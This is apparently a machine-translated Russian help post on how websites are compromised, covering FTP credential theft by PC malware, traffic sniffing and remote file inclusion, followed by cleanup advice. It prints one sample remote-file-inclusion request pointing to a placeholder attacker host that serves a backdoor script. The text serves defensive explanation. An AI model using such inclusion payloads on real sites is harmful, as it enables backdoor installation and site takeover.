Многие веб-сайты, которые мы видели и которые были взломаны, являются результатом вируса на ПК, который используется для передачи файлов FTP на зараженный веб-сайт. Вирус крадет пароль FTP различными способами, но прежде всего двумя.
Во-первых, если вы используете бесплатную программу FTP, такую как FileZilla, вы должны знать, что эти программы хранят свои сохраненные учетные данные для входа в виде простого текстового файла. Вирусу легко найти их, прочитать их и отправить информацию на сервер, который затем регистрируется на FTP с действительными учетными данными, копирует определенные файлы себе, заражает их, а затем отправляет обратно на веб-сайт. Часто он также копирует эти сценарии оболочки «backdoor» на веб-сайт, чтобы при смене паролей FTP они могли повторно заражать сайт.
Вирус также «обнюхивает» трафик FTP. Поскольку FTP передает все данные, включая имя пользователя и пароль, в виде простого текста, вирус может легко увидеть и украсть информацию таким же образом.
Однако довольно часто, когда мы видели бэкдор, вызывающий заражение, это обычно является результатом уязвимости удаленного включения файлов где-то на сайте. Хакеры постоянно пытаются добавить URL, указывающий на один из их бэкдоров, в конец любой строки запроса. Таким образом, в ваших журналах доступа вы можете увидеть что-то вроде:
/ путь / папка / другое / папка / file.php? http://www.hackerswebsite.com/id.txt????
Здесь строка пути / папки предназначена только для демонстрационных целей.
Иногда эта команда работает, и они могут скопировать id.txt на предполагаемый веб-сайт и, таким образом, имеют скрипт оболочки бэкдора, из которого они могут управлять файлами.
Изменить все пароли - FTP, база данных, cPanel или другой административный интерфейс.
Проверять все ПК на наличие вирусов.
Изменить на SFTP.
Проверьте все папки на 755 разрешений и все файлы на 644. Это то, что является стандартным.
Если бы это была инъекция SQL, заражение не было бы в конце файла. Это было бы где-то, где есть SQL-вызов для генерации контента.
Да. В сегодняшних бэкдорах злоумышленник может и, вероятно, уже просматривал файлы config.php, в которых сохранены ваши данные MySQL.
Изменить все пароли.